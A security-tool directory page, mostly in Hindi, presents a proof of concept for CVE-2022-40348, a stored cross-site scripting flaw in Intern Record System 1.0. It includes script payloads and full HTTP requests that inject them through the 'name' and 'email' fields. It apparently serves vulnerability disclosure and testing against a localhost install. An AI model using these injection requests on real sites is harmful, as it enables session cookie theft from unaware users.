Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated — CVE-2022-40348: Intern Record System - 'name' और 'email' Cross-site Scripting (Unauthenticated) | Kitploit
उपकरण/GitHubGitHub/h4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubh4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated

CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated

CVE-2022-40348: Intern Record System - 'name' और 'email' Cross-site Scripting (Unauthenticated)

रिपॉजिटरी देखें
3252 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-40348: इंटर्न रिकॉर्ड सिस्टम - 'name' और 'email' क्रॉस-साइट स्क्रिप्टिंग (अप्रमाणित XSS)

  • एक्सप्लॉइट शीर्षक: इंटर्न रिकॉर्ड सिस्टम - 'name' और 'email' क्रॉस-साइट स्क्रिप्टिंग (अप्रमाणित XSS)
  • दिनांक: 2022-06-09
  • एक्सप्लॉइट लेखक: Hamdi Sevben
  • Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/
  • Software Link: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip
  • संस्करण: 1.0
  • परीक्षित किया गया: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
  • CVE: CVE-2022-40348

संदर्भ:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40348
  • https://nvd.nist.gov/vuln/detail/CVE-2022-40348

1. विवरण:

इंटर्न रिकॉर्ड सिस्टम 1.0 "/intern/controller.php" में पैरामीटर 'name' और 'email' के माध्यम से स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग की अनुमति देता है। इंटर्न रिकॉर्ड सिस्टम क्रॉस-साइट स्क्रिप्टिंग भेद्यता के प्रति संवेदनशील है क्योंकि यह उपयोगकर्ता द्वारा प्रदान किए गए डेटा को पर्याप्त रूप से स्वच्छ करने में विफल रहता है। एक हमलावर इस मुद्दे का उपयोग प्रभावित साइट के संदर्भ में एक अनजान उपयोगकर्ता के ब्राउज़र में मनमाना स्क्रिप्ट कोड निष्पादित करने के लिए कर सकता है। इससे हमलावर कुकी-आधारित प्रमाणीकरण क्रेडेंशियल्स चुरा सकता है और अन्य हमले शुरू कर सकता है।

2. प्रमाण की अवधारणा:

  • 'name' या 'email' पैरामीटर पर http://localhost/intern/controller.php पर पेलोड के साथ Burpsuite अनुरोध
  • http://localhost/intern/view.php पेज पर जाएं
  • पेज को रिफ्रेश करें।
  • XSS ट्रिगर हो जाएगा।
  • अलर्ट पॉपअप होगा।

3. उदाहरण पेलोड:

  • पेलोड-1: <script>alert(document.domain)</script>
  • पेलोड-2: <script>alert(document.cookie)</script>

4. 'name' पैरामीटर पर Burpsuite अनुरोध:

  • इंजेक्शन:
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 78  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=<script>alert(document.domain)</script>&email=&phone=&deptType=3
  • पहचान पृष्ठ:
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

5. 'email' पैरामीटर पर Burpsuite अनुरोध:

  • इंजेक्शन:
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 153  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=&email=<script>alert(document.cookie)</script>&phone=&deptType=3  
  • पहचान पृष्ठ:
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
टूल डाउनलोड करें